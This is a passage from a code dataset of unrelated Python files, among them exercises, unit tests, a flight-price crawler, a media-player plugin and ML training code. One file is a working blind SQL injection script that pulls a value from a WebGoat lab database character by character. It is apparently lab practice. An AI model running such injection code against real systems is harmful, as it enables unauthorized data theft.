Напишите программу, которая найдёт произведение пар чисел списка.\n# Парой считаем первый и последний элемент, второй и предпоследний и т.д.\n# in\n# 4\n\n# out\n# [2, 5, 8, 10]\n# [20, 40]\n\nfrom random import sample\n\n\ndef random_numbers(count):\n if count < 0:\n print(\"Отрицательное число\")\n return []\n\n numbers = sample(range(1, count * 2), count)\n return numbers\n\n\ndef pairs_nums(list_nums: list):\n res_list = []\n len_list = len(list_nums)\n\n for k in range(len_list // 2):\n res_list.append(list_nums[k] * list_nums[len_list - k - 1])\n\n if len_list % 2:\n res_list.append(list_nums[len_list // 2])\n return res_list\n\n\nfinal_list = random_numbers(int(input(\"Введите число: \")))\nprint(final_list)\nprint(pairs_nums(final_list))","repo_name":"kirillnaumenk0/Python_-3-","sub_path":"№2.py","file_name":"№2.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20022208677","text":"#!/usr/bin/env python3\n\"\"\"execute 'pytest' to initate test\"\"\"\n\nfrom circle_class import (Circle)\n\n\ndef test_s1():\n c = Circle(2)\n assert c._radius == 2\n assert c.radius == 2\n assert type(c) == Circle\n\n\ndef test_s2():\n c = Circle(2)\n assert c._diameter == 4\n assert c.diameter == 4\n\n\ndef test_s3():\n c = Circle(4)\n c.diameter = 2\n assert c.diameter == 2\n assert c.radius == 1\n\n\ndef test_s4():\n c = Circle(2)\n assert c.area == 12.566370614359172\n try:\n c.area = 40\n except AttributeError:\n pass\n\n\ndef test_s5():\n c = Circle.from_diameter(8)\n assert c.radius == 4\n\n\ndef test_s6():\n c = Circle(2)\n assert repr(c) == 'Circle(2)'\n\n\ndef test_s7():\n c1 = Circle(2)\n c2 = Circle(4)\n assert (c1 + c2 == Circle(6))\n assert c1*3 == Circle(6)\n assert 3*c1 == Circle(6)\n\n\ndef test_s8():\n c1 = Circle(2)\n c2 = Circle(4)\n assert c1 < c2\n assert c2 > c1\n c3 = Circle(2)\n assert c1 == c3\n","repo_name":"HawkeyeUW/Self_Paced-Online","sub_path":"students/rgpag/lesson08/test_circle.py","file_name":"test_circle.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"17983697001","text":"import sys\nsys.stdin = open('input/boj_12904_A와 B.txt', 'r')\n\nORIGIN = list(input())\nCOMP = list(input())\n\n# HEADER = COMP[0:len(ORIGIN)]\n# OFFSET = COMP[len(ORIGIN):]\n#\n# temp = OFFSET[0]\n# for i in OFFSET[1:]:\n# if temp == i:\n# temp = 'A'\n# else:\n# temp = 'B'\n#\n# if (HEADER == ORIGIN and temp == 'B') or (HEADER != ORIGIN and temp == 'A'):\n# print(0)\n# else:\n# print(1)\n\nwhile len(ORIGIN) != len(COMP):\n if COMP[-1] == 'A':\n COMP.pop()\n else:\n COMP.pop()\n COMP = COMP[::-1]\n\nprint(1 if ORIGIN == COMP else 0)","repo_name":"weekyear/CodingTest","sub_path":"이동규/특강/boj_12904_A와 B.py","file_name":"boj_12904_A와 B.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26196191763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 22 01:18:30 2019\n\n@author: abhijithneilabraham\n\"\"\"\narr=[5,9,10,7,4]\n\nn=5\nk=2\ndef divisibleSumPairs(n, k, arr):\n count=0\n '''\n for i in range(len(arr)):\n m=arr[i]%k\n \n for j in range(len(arr)):\n if arr[j]==m and j!=i :\n count=count+1\n return count\n '''\n for i in range(n):\n for j in range(i+1,n):\n if(arr[i]+arr[j])%k==0:\n count=count+1\n return count\n \nprint(divisibleSumPairs(n,k,arr))\n \n 
","repo_name":"abhijithneilabraham/competitive-coding","sub_path":"algorithm solving/divisible_sum_pairs.py","file_name":"divisible_sum_pairs.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70801646167","text":"from numpy.random import choice\nfrom random import choice as rchoice\nimport pandas as pd\n\n# set some important global parameters\nNO_NATIONS = 1950\nNAME_MAX = 25\n\n# set some global functions\n\n\ndef name_fix(s):\n if s[0] == \" \":\n return \" \" + s.strip()\n else:\n return s.strip()\n\n\ndef passer(s):\n return s\n\n\ndef loadItemsAndProbabilities(filename):\n temp = []\n with open(filename, 'r') as f:\n temp = temp + [passer(line).strip() for line in f]\n items = []\n items_probs = []\n for e in temp:\n a, b = e.split(\",\")\n items.append(a)\n items_probs.append(float(b))\n return [items, items_probs]\n\n\ndef string_split(s, splitindex):\n return s.split(',')[splitindex].strip()\n\n\ndef load_a_big_bang_file(filename):\n dat = pd.read_csv(filename)\n dat['type'] = [s.strip() for s in dat['type']]\n return dat\n\n\ndef loadItems(filename, isNames=False):\n items = ['']\n with open(filename, 'r') as f:\n items = items + [name_fix(line) for line in f]\n return items\n\n\ndef createName(prefixes, prefix_probability,\n base_names, suffixes, suffix_probability, MAXLENGTH):\n name_not_yet_returned = True\n while name_not_yet_returned:\n nation_prefix = choice(prefixes, 1, p=prefix_probability)\n nation_prefix = nation_prefix[0]\n if nation_prefix != \"\":\n if nation_prefix[-1] != \" \":\n nation_prefix += \" \"\n nation_basename = rchoice(base_names)\n\n nation_suffix = choice(suffixes, 1, p=suffix_probability)\n nation_name = nation_prefix + nation_basename + nation_suffix[0]\n if len(nation_name) <= MAXLENGTH:\n name_not_yet_returned = False\n return nation_name\n\n\ndef main():\n\n # NAMES\n base_names = loadItems('birthing/names.txt')\n pfx = loadItems('birthing/prefix.txt')\n sfx = loadItems('birthing/suffix.txt')\n\n pct_empty = 0.35\n pfx_prob = [pct_empty]\n pfx_prob += [(1-pct_empty) / (len(pfx)-1)] * (len(pfx)-1)\n\n pct_empty = 0.98\n sfx_prob = [pct_empty]\n sfx_prob += [(1-pct_empty) / (len(sfx)-1)] * (len(sfx)-1)\n\n exp, exp_probs = loadItemsAndProbabilities('birthing/exports.txt')\n cur, cur_probs = loadItemsAndProbabilities('birthing/currencies.txt')\n\n namesPool = []\n while len(namesPool) < NO_NATIONS:\n name = createName(pfx, pfx_prob, base_names, sfx, sfx_prob, NAME_MAX)\n if name not in namesPool:\n namesPool.append(name)\n\n print(len(namesPool), 'names in the pool')\n\n for n in namesPool:\n if \"L'Isula\" in n:\n print(n)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"joemulberry/nations_api","sub_path":"birthing_names.py","file_name":"birthing_names.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74086941528","text":"x = input('input array: ') #вводим строку через пробел целые числа\narr = list(map(int, x.split())) #разделяем строку на массив целых чисел\n\ncount=0 #вводим счетчик положительных элементов массива\n\nfor val in arr: #для каждого элемента массива цикл\n if val>0: #мы проверяем является ли элемент положительным\n count+=1 #увеличиваем счетчик\n\nprint(\"кол-во положительных чисел в массиве\",count) # выводим кол-во положительных чисел в 
ма��сиве\n","repo_name":"kdulep/DreamTeamProject","sub_path":"positivenumarray.py","file_name":"positivenumarray.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12766544392","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nimport mail\n\n\ndriver = webdriver.Chrome()\nurl = 'https://flight.naver.com/flights/domestic/CJU-GMP-20221023?adult=1&child=0&infant=0&fareType=YC&selectedFlight='\n\nfound = False\ncnt = 1\nwhile True:\n driver.get(url)\n WebDriverWait(driver, 30).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.result')))\n for _ in range(5):\n driver.execute_script('window.scrollTo(0, 10000)')\n time.sleep(3)\n\n elements = driver.find_elements(By.CSS_SELECTOR, '.result')\n for idx, element in enumerate(elements):\n l = element.text.split('\\n')\n if l[1].find('이벤트') != -1:\n del l[1]\n flight, departure_raw_str, price_str = \\\n l[0], l[1][:-3], l[4].split()[1][:-2]\n h, m = map(int, departure_raw_str.split(':'))\n price = int(price_str.replace(',', ''))\n\n if (14, 30) <= (h, m) < (16, 0) and price < 150000:\n driver.find_element(\n By.XPATH, f\"//*[@id=\\\"__next\\\"]/div/div[1]/div[6]/div/div[2]/div[{idx+2}]\").click() # 해당 항공편 선택\n time.sleep(2)\n driver.find_element(\n By.XPATH, \"//*[@id=\\\"__next\\\"]/div/div[1]/div[5]/div/div[2]/div[2]/div/div[1]\").click() # 첫번째 여행사 선택\n time.sleep(2)\n driver.switch_to.window(driver.window_handles[-1])\n\n mail_title = \"조건에 맞는 항공권을 발견했습니다\"\n mail_body = f\"\"\"{flight} {str(h).zfill(2)}:{str(m).zfill(2)} 출발\n{price_str}원\n\n가장 저렴한 여행사 예약링크로 이동합니다. \n결제를 진행해주세요!\n\n{driver.current_url}\n\"\"\"\n\n mail.send_to_me(mail_title, mail_body)\n print(\"Success!\")\n found = True\n break\n\n if found:\n break\n print(f\"Try #{cnt} Failed.\", \"30초 후 다시 탐색합니다...\")\n cnt += 1\n time.sleep(30)\n","repo_name":"yoopark/python-web-crawlers","sub_path":"selenium/naver-flight-ticket-crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35116920490","text":"eg.RegisterPlugin(\n name = \"Windows Media Player\",\n author = \"Oystein Hansen\",\n version = \"0.1.1093\",\n kind = \"program\",\n guid = \"{87D26B8D-990C-457C-85C2-8D634868E1D2}\",\n createMacrosOnAdd = True,\n url = \"http://www.eventghost.net/forum/viewtopic.php?t=284\",\n description = (\n 'Adds actions to control the '\n ''\n 'Windows Media Player.'\n ),\n)\n\n# changelog:\n# 0.2 by bitmonster\n# - changed code to use AddActionsFromList and the new WinApi functions.\n# 0.1 by Oystein Hansen\n# - initial version\n\n\n# Here we define a list of actions we want to produce.\n# Every line consists of a tuple with the following items:\n# 1. The Python name of the action. (no spaces or special characters, except\n# underscore, must begin with a letter)\n# 2. The name of the actions as it is shown to the user.\n# 3. A description of the action or None if no descriptions is available.\n# 4. 
Some data that is later assigned to the self.value member of the action.\n# In this case it is an integer value, that is used as the wParam value\n# for the SendMessage function.\n\nACTIONS = (\n (\"TogglePlay\", \"Toggle Play\", \"Simulate a press on the play / pause button.\", 18808),\n (\"Stop\", \"Stop\", \"Simulate a press on the stop button.\", 18809),\n (\"PreviousTrack\", \"Previous Track\", \"Simulate a press on the previous track button.\", 18810),\n (\"NextTrack\", \"Next Track\", \"Simulate a press on the next track button.\", 18811),\n (\"FastForward\", \"Fast Forward\", \"Fast-forward.\", 18813),\n (\"FastRewind\", \"Rewind\", \"Rewind.\", 18812),\n (\"VolumeUp\", \"Volume Up\", \"Raises WMPlayer's volume by 5%.\", 18815),\n (\"VolumeDown\", \"Volume Down\", \"Lower WMPlayer's volume by 5%.\", 18816),\n (\"ToggleMute\", \"Toggle Mute\", \"Simulate a press on the mute button.\", 18817),\n (\"ToggleShuffle\", \"Toggle Shuffle\", \"Toggles Shuffle.\", 18842),\n (\"ToggleRepeat\", \"Toggle Repeat\", \"Toggles Repeat.\", 18843),\n (\"NowPlaying\", \"Now Playing\", \"Switches to the \\\"Now playing\\\" window.\", 16000),\n (\"Library\", \"Library\", \"Switches to the \\\"Library\\\" window.\", 16004),\n (\"Fullscreen\", \"Fullscreen\", \"Switches between fullscreen and normal mode.\", 18782),\n (\"Exit\", \"Exit\", \"Closes Windows Media Player.\", 57665),\n)\n\n\n# Now we import some other things we will need later\nfrom eg.WinApi import FindWindow, SendMessageTimeout, WM_COMMAND\n\n\n# Next we define a prototype for all actions, because they all work the same\n# way\n\nclass ActionPrototype(eg.ActionClass):\n \"\"\"\n Boilerplate for all actions of this plugin.\n \"\"\"\n # The class attributes 'name', 'description' and 'value' will later be\n # setup by the AddActionsFromList method of the plugin.\n\n def __call__(self):\n \"\"\"\n Find WMPlayer's message window and send it a message with\n SendMessageTimeout.\n \"\"\"\n try:\n hWMP = FindWindow('WMPlayerApp', None)\n return SendMessageTimeout(hWMP, WM_COMMAND, self.value, 0)\n except:\n raise self.Exceptions.ProgramNotRunning\n\n\n# And now we define the actual plugin:\n\nclass WMPlayer(eg.PluginClass):\n\n def __init__(self):\n # Add all actions of our list\n self.AddActionsFromList(ACTIONS, ActionPrototype)\n\n","repo_name":"EventGhost/EventGhost","sub_path":"plugins/WMPlayer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"15859449897","text":"def train(args, train_dataset, val_dataset, model, tokenizer):\n args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)\n train_sampler = RandomSampler(train_dataset) \n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, \n batch_size=args.train_batch_size, num_workers=args.num_workers)\n\n if args.max_steps > 0:\n t_total = args.max_steps\n args.num_train_epochs = args.max_steps // (len(train_dataloader) // \\\n args.gradient_accumulation_steps) + 1\n else:\n t_total = len(train_dataloader) // args.gradient_accumulation_steps \\\n * args.num_train_epochs\n\n # Prepare optimizer and scheduler\n no_decay = ['bias', 'LayerNorm.weight']\n grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not \\\n any(nd in n for nd in no_decay)], 'weight_decay': args.weight_decay},\n {'params': [p for n, p in model.named_parameters() if \\\n any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n 
]\n optimizer = AdamW(grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n if args.scheduler == \"constant\":\n scheduler = WarmupConstantSchedule(\n optimizer, warmup_steps=args.warmup_steps)\n elif args.scheduler == \"linear\":\n scheduler = WarmupLinearSchedule(\n optimizer, warmup_steps=args.warmup_steps, t_total=t_total)\n else:\n raise ValueError(\"Unknown scheduler type: {}\".format(args.scheduler))\n\n if args.n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_dataset))\n logger.info(\" Num Epochs = %d\", args.num_train_epochs)\n logger.info(\" Batch size per GPU = %d\", args.per_gpu_train_batch_size)\n logger.info(\" Total train batch size (w. parallel, & accumulation) = %d\",\n args.train_batch_size * args.gradient_accumulation_steps)\n logger.info(\" Gradient Accumulation steps = %d\", args.gradient_accumulation_steps)\n logger.info(\" Total optimization steps = %d\", t_total)\n\n if args.scst:\n scst_criterion = ScstRewardCriterion()\n logger.info(\" SCST training...\")\n\n global_step, global_loss, global_acc =0, 0.0, 0.0\n model.zero_grad()\n eval_log = []\n best_score = 0\n for epoch in range(int(args.num_train_epochs)):\n for step, (img_keys, batch) in enumerate(train_dataloader):\n batch = tuple(t.to(args.device) for t in batch)\n\n if not args.scst:\n model.train()\n inputs = {'input_ids': batch[0], 'attention_mask': batch[1],\n 'token_type_ids': batch[2], 'img_feats': batch[3], \n 'masked_pos': batch[4], 'masked_ids': batch[5]\n }\n outputs = model(**inputs)\n loss, logits = outputs[:2]\n masked_ids = inputs['masked_ids']\n masked_ids = masked_ids[masked_ids != 0]\n batch_score = compute_score_with_logits(logits, masked_ids)\n batch_acc = torch.sum(batch_score.float()) / torch.sum(inputs['masked_pos'])\n else:\n loss = scst_train_iter(args, train_dataset, model, scst_criterion, img_keys, batch, tokenizer)\n batch_acc = scst_criterion.get_score()\n\n if args.n_gpu > 1: \n loss = loss.mean() # mean() to average on multi-gpu parallel training\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n global_loss += loss.item()\n global_acc += batch_acc\n if (step + 1) % args.gradient_accumulation_steps == 0:\n global_step += 1\n scheduler.step()\n optimizer.step()\n model.zero_grad()\n if global_step % args.logging_steps == 0:\n logger.info(\"Epoch: {}, global_step: {}, lr: {:.6f}, loss: {:.4f} ({:.4f}), \" \\\n \"score: {:.4f} ({:.4f})\".format(epoch, global_step, \n optimizer.param_groups[0][\"lr\"], loss, global_loss / global_step, \n batch_acc, global_acc / global_step)\n )\n\n if (args.save_steps > 0 and global_step % args.save_steps == 0) or \\\n global_step == t_total:\n checkpoint_dir = save_checkpoint(model, tokenizer, args, epoch, global_step) \n # evaluation\n if args.evaluate_during_training: \n logger.info(\"Perform evaluation at step: %d\" % (global_step))\n evaluate_file = evaluate(args, val_dataset, model, tokenizer,\n checkpoint_dir)\n with open(evaluate_file, 'r') as f:\n res = json.load(f)\n best_score = max(best_score, res['CIDEr'])\n res['epoch'] = epoch\n res['global_step'] = step\n res['best_CIDEr'] = best_score\n eval_log.append(res)\n with open(args.output_dir + '/eval_logs.json', 'w') as f:\n json.dump(eval_log, f)\n return global_step, global_loss / 
global_step","repo_name":"garima-mahato/Skunkworks","sub_path":"docs/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40946015992","text":"from abc import ABCMeta, abstractclassmethod\n\nclass Book(object, metaclass=ABCMeta):\n def __int__(self, title, author):\n self.title = title\n self.author = author\n\n @abstractclassmethod\n def display(cls):\n pass\n\n\nclass MyBook(Book):\n def __init__(self, title, author, price):\n self.title = title\n self.author = author\n self.price = price\n\n def display(self):\n print('Title: {} \\nAuthor: {} \\nPrice: {}'\n .format(self.title, self.author, self.price))\n\n\ntitle = input()\nauthor = input()\nprice = int(input())\nnew_novel = MyBook(title, author, price)\nnew_novel.display()\n","repo_name":"SooDevv/Algorithm_Training","sub_path":"Hackerrank/30 Days of Code/Day13.py","file_name":"Day13.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34393990974","text":"from requests import post # 값 전달과 읽기를 위한 requests 모듈 불러오기\r\n\r\nuri = 'http://127.0.0.1:8080/WebGoat/attack?Screen=1315528047&menu=1100' # 값을 전달할 대상\r\npayload = \"101 and (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'),{},1)='{}');\" # payload 문자열을 1개씩 짤라서 비교한다\r\nparams = {'account_number':'', 'SUBMIT':'Go!'} # post로 전달할 인자값\r\nsession = {'JSESSIONID':'ADD1A83FBD4479857023514A6A496B5A'} # 로그인을 유지하려면 세션이 필요하기 때문에 쿠키 값 저장\r\n\r\nflag = '' # 문자를 1개씩 찾아 나중엔 완성될 flag 변수\r\n\r\nfor x in range(1, 50): # 넉넉하게 50번 반복\r\n\tfor y in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ': # 원래 ord와 chr를 이용해서 구현하려 했으나 잦은 오류로 이렇게 구현\r\n\t\tparams['account_number'] = payload.format(x, y) # params에 있는 account_number에 payload 값을 하나씩 변경 해주면서 대입\r\n\t\t\r\n\t\tr = post(uri, data = params, cookies = session).text # post 형식으로 전송하고 읽어오기\r\n\r\n\t\tif(r.find('Account number is valid') != -1): # if Account number is valid라는 값이 나오면 다음 명령 실행 \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t#(-1이 아닐 떄라고 하는 이유는 저 문자열이 없을 떄 -1을 반환하기 때문에)\r\n\t\t\tflag += y # 찾은 문자 flag에 추가\r\n\t\t\tprint(flag) # 확인차 출력\r\n\t\t\tbreak # 다시 위에 for문 돌기\r\n\r\n\t\tif(y == 'Z') : # 위에 break문에서 for문을 못빠져 나갔으면 flag가 완성된거기 때문에\r\n\t\t\texit(0) # 프로그램 종료","repo_name":"woozek/problem_script","sub_path":"Web_goat/Web_goat(Blind String SQL Injection)_pyscript.py","file_name":"Web_goat(Blind String SQL Injection)_pyscript.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40296918818","text":"import logging\nimport torch\n\nfrom .piecewise_lr import PiecewiseLR\n\ndef optim_sched(epochs, net, *kargs, **kvargs):\n batch_size, train_size = 512, 50000\n steps_per_epoch = round(train_size / batch_size)\n total_steps = steps_per_epoch * epochs\n warmup_steps = steps_per_epoch * 15 # first 15 epochs\n\n lr, momentum, weight_decay = 0.4, 0.9, 5e-4\n optim = torch.optim.SGD(net.parameters(),\n lr, momentum=momentum, weight_decay=weight_decay)\n\n # sched = torch.optim.lr_scheduler.OneCycleLR(\n # optim, max_lr=lr, epochs=epochs, steps_per_epoch=steps_per_epoch,\n # pct_start=warmup_steps/total_steps, anneal_strategy='cos',\n # cycle_momentum=True, div_factor=1.0e5,\n # final_div_factor=1.0e10\n # )\n sched = PiecewiseLR(optim, epochs=[0, 15, 35, 100, 200, 600],\n lrs=[1e-8, lr, 1e-2, 1e-3, 5e-4, 1e-4],\n 
steps_per_epoch=steps_per_epoch)\n logging.info(f'lr={lr}, momentum={momentum}, weight_decay={weight_decay}, epochs={sched.epochs}, lrs={sched.lrs}')\n\n sched_on_epoch = False\n\n return optim, sched, sched_on_epoch, batch_size","repo_name":"sytelus/cifar_testbed","sub_path":"torch_testbed/optims/superconv.py","file_name":"superconv.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8495082455","text":"import asyncio\nfrom queue import Queue\nimport sys\n\nfrom audio_engine import AudioEngine\nfrom web_socket_server import WebSocketServer\n\nfrom logger import create_logger\nlogger = create_logger(\"main\")\n\nAUDIO_PORT = 3001\nDATA_PORT = 3000\n\n\nasync def main():\n logger.info(\"starting application\")\n\n if len(sys.argv) < 2:\n logger.error(\"No audio file argument provided.\")\n exit(1)\n\n audio_engine = AudioEngine(sys.argv[1])\n\n audio_socket = WebSocketServer(AUDIO_PORT)\n data_socket = WebSocketServer(DATA_PORT)\n\n data_socket.set_out_queue(audio_engine.queue)\n\n audio_engine.set_audio_queue(audio_socket.queue)\n audio_engine.set_data_queue(data_socket.queue)\n\n await asyncio.gather(\n asyncio.to_thread(audio_engine.queue_processor),\n\n asyncio.to_thread(audio_socket.queue_processor),\n asyncio.to_thread(data_socket.queue_processor),\n\n asyncio.to_thread(audio_socket.serve),\n asyncio.to_thread(data_socket.serve),\n\n asyncio.to_thread(audio_engine.run),\n )\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"aelitneg/web-audio-injector","sub_path":"server/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23497640164","text":"print('welcome')\ntry:\n a=int(input('a value:'))\n b=int(input('b value:'))\n c=a/b\nexcept ZeroDivisionError :\n print('b shouldd not be 0.')\nexcept TypeError :\n print('no spaces allowed here')\nexcept ValueError :\n print(' a and b should be integers')\nexcept :\n print('other errors')\nelse:\n print(f'{a}/{b}result is {c}')\n","repo_name":"venkatr21/python_coding","sub_path":"errorhandling.py","file_name":"errorhandling.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23357561112","text":"\"\"\"\ndatos de entrada\nprecio total-->pt-->float\nprecio de cuotas-->pc-->float\ndatos de saldida\nextra-->x-->float\n\"\"\"\n#entrada\npt=float(input(\"precio total \"))\npc=float(input(\"precio cuotas\"))\n#caje negra\nx=pc-(pt/12)\n#salida\nprint(\"el porcentaje extra es \",x,\"%\")","repo_name":"nisanvar/trabajo","sub_path":"taller estructuas de control secuenciales/punto_21.py","file_name":"punto_21.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20302552319","text":"from fastapi import HTTPException\nfrom sqlalchemy import cast, func, Numeric\nfrom sqlalchemy.orm import Session\n\nfrom models.category import Category\nfrom models.transaction import Transaction\nfrom schemas.trend import CategoryFrequency, MostFrequentCategories, CategorySpending, MostExpensiveCategories\n\n\ndef get_most_frequent_categories(db: Session, user_id: int, year: int) -> MostFrequentCategories:\n \"\"\"\n Returns the 5 categories with the biggest number of occurrences.\n \"\"\"\n # Query to find the 
categories with the biggest number of occurrences\n category_counts = (\n db.query(\n Transaction.mcc,\n func.count().label('count')\n )\n .filter(\n Transaction.user_id == user_id, \n Transaction.year == year\n )\n .group_by(Transaction.mcc) \n .order_by(func.count().desc())\n .limit(5)\n .all()\n )\n\n # If no categories are found, raise an exception\n if not category_counts:\n raise HTTPException(status_code=404, detail=\"No categories found\")\n \n top_categories = []\n for category_count in category_counts:\n # Retrieve MCC description from categories table\n category_description = (\n db.query(\n Category.general_description, \n Category.full_description\n )\n .filter(Category.mcc == category_count.mcc)\n .first()\n )\n top_categories.append(\n CategoryFrequency(\n full_description=category_description.full_description,\n general_description=category_description.general_description,\n num_occurrences=category_count.count\n )\n )\n\n # Create a MostFrequentCategories object and return\n most_frequent_categories = MostFrequentCategories(top_categories=top_categories)\n return most_frequent_categories\n\n\ndef get_most_expensive_categories(db: Session, user_id: int, year: int) -> MostExpensiveCategories:\n \"\"\"\n Returns the 5 categories in which the user spent the most.\n \"\"\"\n # Query to find the categories with the biggest sum of amounts\n category_totals = (\n db.query(\n Transaction.mcc,\n cast(func.sum(Transaction.amount), Numeric(10, 0)).label('total')\n )\n .filter(\n Transaction.user_id == user_id, \n Transaction.year == year\n )\n .group_by(Transaction.mcc) \n .order_by(func.sum(Transaction.amount).desc())\n .limit(5)\n .all()\n )\n\n # If no categories are found, raise an exception\n if not category_totals:\n raise HTTPException(status_code=404, detail=\"No categories found\")\n \n top_categories = []\n for category_total in category_totals:\n # Retrieve MCC description from categories table\n category_description = (\n db.query(\n Category.general_description, \n Category.full_description\n )\n .filter(Category.mcc == category_total.mcc)\n .first()\n )\n top_categories.append(\n CategorySpending(\n full_description=category_description.full_description,\n general_description=category_description.general_description,\n total_amount=category_total.total\n )\n )\n\n # Create a MostExpensiveCategories object and return\n most_expensive_categories = MostExpensiveCategories(top_categories=top_categories)\n return most_expensive_categories","repo_name":"emmanuelsdias/hyper-wrapped","sub_path":"backend/controllers/category_controller.py","file_name":"category_controller.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40931680812","text":"def number(temp):\n if temp == 'zero':\n return '0'\n elif temp == 'one':\n return '1'\n elif temp == 'two':\n return '2'\n elif temp == 'three':\n return '3'\n elif temp == 'four':\n return '4'\n elif temp == 'five':\n return '5'\n elif temp == 'six':\n return '6'\n elif temp == 'seven':\n return '7'\n elif temp == 'eight':\n return '8'\n elif temp == 'nine':\n return '9'\n else:\n return '-1'\n\n\ndef solution(s):\n answer = ''\n\n temp = ''\n for i in range(len(s)):\n if s[i].isdigit():\n temp = ''\n answer += s[i]\n else:\n temp += s[i]\n if i == len(s) - 1:\n answer += number(temp)\n elif s[i + 1].isdigit():\n answer += number(temp)\n elif len(temp) >= 3:\n x = number(temp)\n if x == '-1':\n pass\n else:\n answer += x\n temp = ''\n\n 
return int(answer)","repo_name":"Parksohui/Algorithm","sub_path":"programmers/숫자문자열과영단어.py","file_name":"숫자문자열과영단어.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"406960016","text":"import torch\nfrom torch.utils.data import DataLoader\nimport pickle\nfrom p1_model import ResNet_feature_extractor\nfrom p1_dataset import VideoDataset\n#from sklearn.manifold import TSNE\n#from matplotlib import pyplot as plt\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device('cuda' if use_cuda else 'cpu')\nprint('Device used', device)\n\ntrainset = VideoDataset(t_v='train')\ntrainloader = DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\nvalidset = VideoDataset(t_v='valid')\nvalidloader = DataLoader(validset, batch_size=1, shuffle=False, num_workers=1)\n\nfeature_extractor = ResNet_feature_extractor().to(device)\nfeature_extractor.eval()\n\ntrain_feature = []\ntrain_label = []\nwith torch.no_grad():\n for i, (data, label) in enumerate(trainloader):\n data = data.to(device).squeeze(0)\n feature = feature_extractor(data)\n feature = torch.mean(feature, 0).cpu()\n train_feature.append(feature)\n train_label.append(label.item())\nwith open('./features/train_feature.pickle', 'wb') as f:\n pickle.dump(train_feature, f)\nwith open('./features/train_label.pickle', 'wb') as f:\n pickle.dump(train_label, f) \nprint('train feature finished')\n\nvalid_feature = []\nvalid_label = []\nwith torch.no_grad():\n for i, (data, label) in enumerate(validloader):\n data = data.to(device).squeeze(0)\n feature = feature_extractor(data)\n feature = torch.mean(feature, 0).cpu()\n valid_feature.append(feature)\n valid_label.append(label.item())\nwith open('./features/valid_feature.pickle', 'wb') as f:\n pickle.dump(valid_feature, f)\nwith open('./features/valid_label.pickle', 'wb') as f:\n pickle.dump(valid_label, f)\nprint('validation feature finished')\n'''\ntsne = TSNE(n_components=2, random_state=0)\nX_2d = tsne.fit_transform(valid_feature)\ntarget_names = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ntarget_ids = range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[valid_label == i, 0], X_2d[valid_label == i, 